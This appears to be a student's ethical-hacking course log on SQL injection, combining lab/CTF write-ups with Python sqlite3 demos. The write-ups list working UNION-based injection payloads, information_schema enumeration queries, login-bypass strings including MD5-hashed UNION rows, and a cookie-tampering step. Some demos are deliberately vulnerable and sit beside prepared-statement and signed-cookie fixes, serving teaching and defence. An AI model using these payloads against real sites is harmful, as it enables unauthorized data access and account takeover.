Wednesday, May 21, 2025

Segfault ethical hacking week 6

 

1. Review

SQL Injection 1

Login page
You must create it yourself to understand how it works internally during login.
It’s essential to know what happens after identification/authentication and what results are returned when a SELECT statement is executed.
Only then can you study various approaches.
Make sure to build it, test it, practice with it, and research it thoroughly.


When problems occur
1) Identify the root cause

- Many times, problems can’t be solved because the root cause isn’t identified.
- It’s important to build and run it yourself to see where and why the issue occurs.

2) After that, you will be able to find a solution.



Prepared Statement

With a prepared statement the query text is fixed before any user input is seen, and the input is sent separately as bound parameter values. The input can never change the structure of the statement, so SQL Injection into that statement is not possible. Two caveats: it only helps if the query text itself is not still assembled by string concatenation before being prepared, and only values can be bound, not identifiers such as table or column names or an ORDER BY target.
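The difference between the concatenated query and the prepared statement, as an added example that is not part of the course material. It uses Python's built-in sqlite3 module rather than MySQL, with a constructed two-column member table; SQLite takes "--" as the line comment where MySQL also accepts "#".

```python
import sqlite3

# Constructed accounts for the example (not the lab's data).
USERS = [("doldol", "dol1234"), ("normaltic", "test")]


def make_db():
    """In-memory SQLite database with a member(id, pass) table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (id TEXT, pass TEXT)")
    db.executemany("INSERT INTO member VALUES (?, ?)", USERS)
    return db


def login_vulnerable(db, user, pw):
    """Builds the query by string concatenation: the input becomes part of the SQL."""
    sql = f"SELECT id FROM member WHERE id='{user}' AND pass='{pw}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_prepared(db, user, pw):
    """Query text is fixed; the values travel separately as bound parameters."""
    sql = "SELECT id FROM member WHERE id=? AND pass=?"
    row = db.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None


def demo():
    db = make_db()
    comment_out = "doldol'-- "        # closes the quote, comments out the password check
    always_true = "x' OR '1'='1"      # makes the WHERE clause true for every row
    return {
        "normal_vuln": login_vulnerable(db, "doldol", "dol1234"),
        "normal_prep": login_prepared(db, "doldol", "dol1234"),
        # Concatenation: both payloads log in without knowing a password.
        "comment_vuln": login_vulnerable(db, comment_out, "wrong"),
        "or_vuln": login_vulnerable(db, always_true, always_true),
        # Prepared: the same strings are just literal, non-existent user names.
        "comment_prep": login_prepared(db, comment_out, "wrong"),
        "or_prep": login_prepared(db, always_true, always_true),
    }
```

Run demo() to see the same payloads succeed against the concatenated query and fail against the bound one; the only thing that changed is how the input reaches the database.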


SQL Injection 2


Data Extraction
1) A database (DB) is where the application stores the data it works with.
2) Does that data appear on the screen or not?
 - Appears on the web page: e.g., message boards
 - Does not appear on the web page: e.g., login, ID duplication check, etc.

When data appears on the web page
Methods of data extraction

Input: 1' or '1'='1

Resulting query:
select * from board where idx='1' or '1'='1'

'1'='1' is always true, so the WHERE clause matches every row and the whole table is displayed.


Union

SELECT * FROM board WHERE idx='_____'   <- everything after the injection point is under the attacker's control.
By appending UNION, you can run a second SELECT statement of your own and have its rows added to the result.

(select ~~~) union (select ~~~)
select pass from member union select id from member


select id,pass from member union select 1,2
select id,pass from member union select 'normaltic','test'
                                       


When using UNION, both SELECT statements must return exactly the same number of columns (in databases other than MySQL the column types must be compatible as well; MySQL converts them).


Order by Syntax

select id,pass from member order by id,pass
At the end of the SELECT statement, specify the column names you want to sort by.
(You can also use column index numbers instead of names; an index larger than the number of columns is an error, which is what the column-count step below relies on.)




Union SQL Injection Process

1. Find SQL Injection Point
 
2. Find the number of Columns

3. Find the Position of Displayed Columns

4. Check the Database Names

5. Check the Table Names

6. Check the Column Names

7. Extract the Data




Homework

  1. Review Union SQL Injection

  2. Display only Doldol's data (Show only one record that belongs to Doldol)

  3. CTF Challenge

  4. Web Development

    • Login 

    • Sign Up 

    • My Page (in progress)

    • Bulletin Board (to do)



1. SQL Injection 1

1) Finding the SQL Injection point

Enter Adminer%' and '1%'='1 to check if any data is returned. If the same results come back as for plain Adminer, the input lands inside a LIKE '%...%' pattern and the quote is not being escaped.





2) Finding the number of columns

Entering Adminer%' order by 1# through 4# returns results.
From 5# onwards, no results are returned, indicating that there are 4 columns.



3) Finding the position of the displayed column

Enter: Adminer%' union select 1,2,3,4#



4) Checking the database name

Enter: Adminer%' union select 1, database(), 3, 4#




I can find that the database name is sqli_1.

5) Finding table names

Enter:
Adminer%' union select 1, table_name, 3, 4 from information_schema.tables where table_schema='sqli_1'#



I can find flag_table and plusFlag_Table.
Check which one contains the actual flag.


6) Finding column names

Enter:
Adminer%' union select 1, column_name, 3, 4 from information_schema.columns where table_name='flag_table'#



I can confirm that the flag column is returned.

Enter:
Adminer%' union select 1, column_name, 3, 4 from information_schema.columns where table_name='plusFlag_Table'#




7) Displaying the data

Adminer%' union select flag,2,3,4 from flag_table#



Adminer%' union select idx,flag,3,4 from plusFlag_Table#


I find this value as well. I have no idea what it is.



2. SQL Injection 2

1) Finding the SQL Injection point

Enter normaltic%' and '1%'='1 to check if any data is returned.



2) Finding the number of columns

Entering normaltic%' order by 1# through 6# returns results.
From 7# onwards, no results are returned, indicating that there are 6 columns.



3) Finding the position of the displayed columns

Enter:
normaltic%' union select 1, 2, 3, 4, 5, 6#



I can confirm that column 1 displays the input value and column 6 displays the info.


4) Checking the database name

Enter:
normaltic%' union select 1, 2, 3, 4, 5, database()#




I can find that the database name is sqli_5.

5) Finding table names

Enter:
normaltic%' union select 1, 2, 3, 4, 5, table_name from information_schema.tables where table_schema='sqli_5'#




I can find a table named flag_honey.


6) Finding column names

normaltic%' union select 1,2,3,4,5,column_name from information_schema.columns where table_name='flag_honey'#




I can confirm that flag is returned.




7) Displaying Data

normaltic%' union select 1,2,3,4,5,flag from flag_honey#

But this flag turns out to be incorrect.

So you go back to the beginning.


2-1) to 2-4) Repeating the first four steps gives the same results as before: normaltic%' and '1%'='1 still returns data, order by 1# through 6# works and 7# does not (6 columns), columns 1 and 6 are displayed, and database() returns sqli_5.





2-5) Finding table names

The page appears to show only the first row of the result, so the earlier table-name query only ever revealed one table. Adding an ORDER BY sorts the whole UNION result and changes which row comes first:

normaltic%' union select 1,2,3,4,5,table_name from information_schema.tables where table_schema='sqli_5' order by 1#

normaltic%' union select 1,2,3,4,5,table_name from information_schema.tables where table_schema='sqli_5' order by 2#

I can find a table named secret.



2-7) Displaying data

(The column-name step is skipped here on the assumption that the column is again named flag.)

Enter:
normaltic%' union select 1,2,3,4,5,flag from secret#

But this also doesn't work.






3-7) Displaying data

normaltic%' union select 1,2,3,4,5,flag from secret order by 1#

With order by 1 the injected row, whose first column is the literal 1, sorts to the front of the combined result and becomes the single row the page displays.
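The seven-step Union SQL Injection process from the Review section, carried through end to end, plus the single-row case just above where ORDER BY decides which row the page shows. This is an added example, not code from the course: it runs against a constructed board table in Python's sqlite3 instead of MySQL, so the catalog queries use sqlite_master and the pragma_table_info() table-valued function in place of information_schema, there is no database() function, and "--" is the comment marker instead of "#". The page is simulated as rendering columns 1 and 2 (idx, title) of each result row.

```python
import sqlite3

# Constructed sample data: a board table plus a flag table, as in the lab.
BOARD_ROWS = [
    (10, "Adminer notes", "first post", "admin"),
    (11, "Adminer again", "second post", "admin"),
    (12, "unrelated", "third post", "normaltic"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE board (idx INTEGER, title TEXT, content TEXT, writer TEXT)")
    db.executemany("INSERT INTO board VALUES (?, ?, ?, ?)", BOARD_ROWS)
    db.execute("CREATE TABLE flag_table (flag TEXT)")
    db.execute("INSERT INTO flag_table VALUES ('FLAG{constructed_example}')")
    return db


def search(db, keyword, first_row_only=False):
    """Vulnerable board search: the keyword is spliced straight into a LIKE pattern.
    Returns the (idx, title) pairs the page would render, or only the first pair
    when first_row_only is set, and None when the query errors (the lab's 'no results')."""
    sql = f"SELECT idx, title, content, writer FROM board WHERE title LIKE '%{keyword}%'"
    try:
        cur = db.execute(sql)
        rows = [cur.fetchone()] if first_row_only else cur.fetchall()
    except sqlite3.Error:
        return None
    return [(r[0], r[1]) for r in rows if r is not None]


# Step 1: '1%'='1%' is always true, so the search behaves exactly as before;
# a broken query would have returned None instead.
def confirm_injection(db):
    return search(db, "Adminer%' AND '1%'='1") == search(db, "Adminer")


# Step 2: ORDER BY n works up to the column count and errors past it.
def count_columns(db, max_cols=10):
    n = 0
    for i in range(1, max_cols + 1):
        if search(db, f"Adminer%' ORDER BY {i}-- ") is None:
            break
        n = i
    return n


# Step 3: one marker per column; the markers that show up reveal the positions.
# 'zzz' matches no title, so only the UNION row comes back.
def displayed_positions(db, ncols):
    markers = ", ".join(f"'m{i}'" for i in range(1, ncols + 1))
    rows = search(db, f"zzz%' UNION SELECT {markers}-- ")
    return sorted(int(v[1:]) for r in rows for v in r)


# Steps 5-6: catalog queries through the displayed column (sqlite_master and
# pragma_table_info stand in for information_schema.tables/columns).
def table_names(db):
    rows = search(db, "zzz%' UNION SELECT 1, name, 3, 4 FROM sqlite_master WHERE type='table'-- ")
    return sorted(title for _, title in rows)


def column_names(db, table):
    rows = search(db, f"zzz%' UNION SELECT 1, name, 3, 4 FROM pragma_table_info('{table}')-- ")
    return [title for _, title in rows]


# Step 7: extract the data.
def extract_flag(db):
    rows = search(db, "zzz%' UNION SELECT 1, flag, 3, 4 FROM flag_table-- ")
    return rows[0][1]


# Single-row page: ORDER BY on the whole UNION result decides whether the
# injected row (idx literal 1) or a real post (idx 10..12) comes first.
def extract_flag_one_row(db, direction="ASC"):
    payload = f"Adminer%' UNION SELECT 1, flag, 3, 4 FROM flag_table ORDER BY 1 {direction}-- "
    rows = search(db, payload, first_row_only=True)
    return rows[0][1]


def demo():
    db = make_db()
    ncols = count_columns(db)
    return {
        "injectable": confirm_injection(db),
        "columns": ncols,
        "displayed": displayed_positions(db, ncols),
        "tables": table_names(db),
        "flag_columns": column_names(db, "flag_table"),
        "flag": extract_flag(db),
        "one_row_asc": extract_flag_one_row(db, "ASC"),
        "one_row_desc": extract_flag_one_row(db, "DESC"),
    }
```

demo() walks the steps in order; the last two entries show the same injected row either surfacing as the only displayed row or being hidden behind a real post, depending purely on the sort direction.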




3. Login Bypass 3

1) Finding the SQL Injection point

  • doldol' and '1'='1 / dol1234: Login successful

  • doldol' or '1'='1 / dol1234: Login failed

  • doldol'# / dol1234: Login successful

  • doldol'# / 1234: Login failed

AND conditions and # comments work, so the input lands inside a quoted string in the query.
The password must still match to log in: or '1'='1 returns a row, but the password check fails.




2) Finding the number of columns

  • doldol' order by 1#, 2#: Login works

  • doldol' order by 3#: Error

So, there are 2 columns—likely ID and Password.



3) Login test

  • 1' union select 'doldol',dol1234 / dol1234: Login successful

  • 1' union select 'doldol','1234 / 1234: Login successful




4) Logging in as normaltic3

  • 1' union select 'normaltic3','1234 / 1234: Login successful







4. Login Bypass 4

1) Finding the SQL Injection point

  • doldol' and '1'='1 / dol1234: Login successful

  • doldol' or '1'='1 / dol1234: Login failed

  • doldol'# / dol1234: Login successful

  • doldol'# / 1234: Login failed

AND conditions and # comments work, so the input lands inside a quoted string in the query.
The password must still match to log in.




2) Finding the number of columns

  • doldol' order by 1#, 2#: Login works

  • doldol' order by 3#: Error

So, there are 2 columns—likely ID and Password.


3) Login test

  • 1' union select 'doldol',dol1234 / dol1234: Login failed

  • 1' union select 'doldol','1234 / 1234: Login failed

Possibly the password is being hashed and can't be matched in plaintext.

Applications that hash passwords store them with statements along these lines:

UPDATE table SET Password = MD5(Password) WHERE ID!=[specified index]
UPDATE users SET password = SHA('secret_password') WHERE ....;

So the injected row has to carry the hash the application will compare against. You try using an MD5 hash:

1' union select 'doldol',MD5('dol1234')# / dol1234 Login successful

4) Login using normaltic4

1' union select 'normaltic4',MD5('1234')# / 1234 : Login successful
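Login Bypass 3 and 4 side by side, as an added example that is not part of the course material. The login is modelled as "look the user up by id, then compare the stored pass column with the submitted password (hashed with MD5 when the application hashes)"; the accounts are constructed and it runs on Python's sqlite3, which has no MD5() function, so the attacker computes the hash with hashlib instead of calling MD5() inside the injected query as the lab does on MySQL.

```python
import hashlib
import sqlite3

# Constructed accounts (not the lab's).
ACCOUNTS = [("doldol", "dol1234"), ("normaltic4", "unknown-to-attacker")]


def md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def make_db(hashed):
    """member(id, pass) with plaintext (Login Bypass 3) or MD5 (Login Bypass 4) passwords."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (id TEXT, pass TEXT)")
    db.executemany("INSERT INTO member VALUES (?, ?)",
                   [(u, md5(p) if hashed else p) for u, p in ACCOUNTS])
    return db


def login(db, user, pw, hashed):
    """Vulnerable login: the id is string-spliced into the query, then the stored
    pass column is compared with the submitted password (or its MD5)."""
    row = db.execute(f"SELECT id, pass FROM member WHERE id='{user}'").fetchone()
    if row is None:
        return None
    submitted = md5(pw) if hashed else pw
    return row[0] if row[1] == submitted else None


def demo():
    plain = make_db(hashed=False)
    hashed = make_db(hashed=True)
    # The UNION row is entirely attacker-supplied, so it can name any user and
    # carry whatever value the password comparison needs.
    plain_union = "1' UNION SELECT 'normaltic3', '1234'-- "
    hash_union = "1' UNION SELECT 'normaltic4', '" + md5("1234") + "'-- "
    return {
        # Login Bypass 3: plaintext storage, plaintext in the injected row.
        "plain_union": login(plain, plain_union, "1234", False),
        # Login Bypass 4: same payload fails because the app compares MD5(pw) ...
        "hashed_plain_union": login(hashed, "1' UNION SELECT 'normaltic4', '1234'-- ", "1234", True),
        # ... and succeeds once the injected value is the hash the app expects.
        "hashed_md5_union": login(hashed, hash_union, "1234", True),
        # The lab's or-trick returns doldol's row, but the password still has to match.
        "or_true": login(hashed, "doldol' OR '1'='1", "wrong", True),
        # The comment trick logs in only when the real password is supplied.
        "comment_real_pw": login(hashed, "doldol'-- ", "dol1234", True),
    }
```

The hashing changes nothing about the injection itself: the application still trusts a row that the attacker's own UNION produced. Binding the id as a query parameter removes the UNION entirely, and comparing the hash is only a defence against leaked databases, not against this.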
 


5. Login Bypass 5

1) Finding the SQL Injection point

  • doldol' and '1'='1 / dol1234: Login successful

  • doldol' or '1'='1 / dol1234: Login failed

  • doldol'# / dol1234: Login successful

  • doldol'# / 1234: Login failed

AND conditions and # comments work, so the input lands inside a quoted string in the query.
The password must still match to log in.




2) Finding the number of columns

  • doldol' order by 1#, 2#, 3#: Login works

  • doldol' order by 4#: Error

So, there are 3 columns—likely ID, Password, and something else.



3) Login test

  • 1' union select 'doldol',dol1234 / dol1234: Login failed

  • 1' union select 'doldol','1234 / 1234: Login failed



4) Go back and check using Burp Suite


You discover in Burp Suite that after login the cookie names the logged-in user as doldol, and the response redirects to index.php.


Send the request using Repeater and change the login user to normaltic5.


I got the flag.
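Why editing the cookie in Repeater works, and the check that stops it, as an added example that is not part of the course material: the lab's cookie is modelled as the bare user name, and the hardened variant appends an HMAC under an assumed server-side secret (constructed here) so that a changed name no longer verifies.

```python
import hashlib
import hmac

# Assumed server-side secret, constructed for the example.
SERVER_SECRET = b"constructed-example-secret"


def set_plain_cookie(user):
    """What the lab's application appears to do: the cookie is just the name."""
    return f"user={user}"


def user_from_plain_cookie(cookie):
    """The server believes whatever the client sends back."""
    return cookie.split("=", 1)[1]


def set_signed_cookie(user):
    """Hardened variant: append an HMAC so the server can detect edited values."""
    tag = hmac.new(SERVER_SECRET, user.encode(), hashlib.sha256).hexdigest()
    return f"user={user}.{tag}"


def user_from_signed_cookie(cookie):
    """Recompute the tag for the presented name; reject on mismatch."""
    value = cookie.split("=", 1)[1]
    user, _, tag = value.rpartition(".")
    expected = hmac.new(SERVER_SECRET, user.encode(), hashlib.sha256).hexdigest()
    return user if hmac.compare_digest(tag, expected) else None


def demo():
    # Log in as doldol, then edit the cookie in Repeater to name normaltic5.
    forged_plain = set_plain_cookie("doldol").replace("doldol", "normaltic5")
    forged_signed = set_signed_cookie("doldol").replace("doldol", "normaltic5")
    return {
        "plain_forged": user_from_plain_cookie(forged_plain),
        "signed_forged": user_from_signed_cookie(forged_signed),
        "signed_genuine": user_from_signed_cookie(set_signed_cookie("doldol")),
    }
```

A signed cookie still carries the name in the clear; what it prevents is the client changing it. An opaque session id looked up server-side is the more common fix, and the HMAC check is the minimum that makes this particular edit fail.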
